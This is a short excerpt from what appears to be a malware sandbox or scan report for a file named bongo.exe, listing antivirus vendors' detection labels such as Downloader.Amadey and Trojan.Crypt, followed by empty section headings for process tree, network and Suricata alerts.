Rising	Downloader.Amadey!8.125AC (TFE:5:YY7xLY9BnhR)
Ikarus	Trojan.Crypt
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/PossibleThreat
AVG	Win32:TrojanX-gen [Trj]
DeepInstinct	MALICIOUS

bongo.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All